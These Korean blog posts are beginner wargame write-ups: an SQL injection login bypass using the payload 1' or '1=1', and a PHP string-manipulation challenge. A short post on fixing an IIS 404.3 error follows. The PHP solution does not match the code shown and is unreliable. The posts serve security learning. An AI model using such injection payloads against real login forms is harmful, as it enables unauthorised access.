카테고리 없음2012. 11. 22. 17:25

Newbie wargame sql injection 1

Newbie Wargame


sql Injection 1




id, pw 입력칸과 로그인버튼을 준다

밑에 query는 입력된 query값 출력하는것으로 보인다


ad : admin

pw : 1' or '1=1



query : select * from newb_sqli where id='admin' and pw='1' or '1=1'


mission complete



http://chr0m3.tistory.com/10


저작자표시 비영리 변경금지
Posted by babuzzzy
카테고리 없음2012. 11. 22. 16:45

Newbie Wargame PHP 2번째 문제



<?php

if($_GET[id])

{

$str = $_GET[id];


$str = str_replace("a", " ",$str);

$str = str_replace("ruby", "nimda", $str);

$ans = substr($str, 5,5);


if ($ans =="admin") {

echo "Password is [$password]";

}

else{

echo "$ans";

}

}

?>




$str = $_get[id];

id를 get메소드로 받아와서 변수 str에 저장합니다



$str = str_replace("a", " ",$str);

$str = str_replace("ruby", "nimda", $str);


변수 str의 값에 a가 있으면 a를 지웁니다

변수 str의 값에 ruby가 있으면 nimda로 바꿉니다


$ans = substr($str, 5,5);

변수 ans에 str의 값을 인덱스 5부터 5개 저장합니다


if($ans == "admin")

{

echo "password is [$password]";

}

변수 ans의 값이 admin이면 패스워드를 출력한다


else

{

echo "$ans";

}

아닐 경우 변수 ans의 값을 출력합니다


그러면 최종 ans가 admin이 나오도록 입력값을 추측할수 있다



그려면~ url 에 id파라미터를 삽입해서 입력한다


ex)http://withkrystal.woobi.co.kr/newb/prob8.html?id=1rubyadmin




저작자표시 비영리 변경금지
Posted by babuzzzy
카테고리 없음2012. 11. 19. 17:01

ASP 에서 " HTTP 오류 404.3 - Not Found " 해결법


윈도우 기능 추가에서

WWW-> 응용프로그램-> 하위 폴더의 모든 체크란 체크




끝 

저작자표시 비영리 변경금지
Posted by babuzzzy

티스토리툴바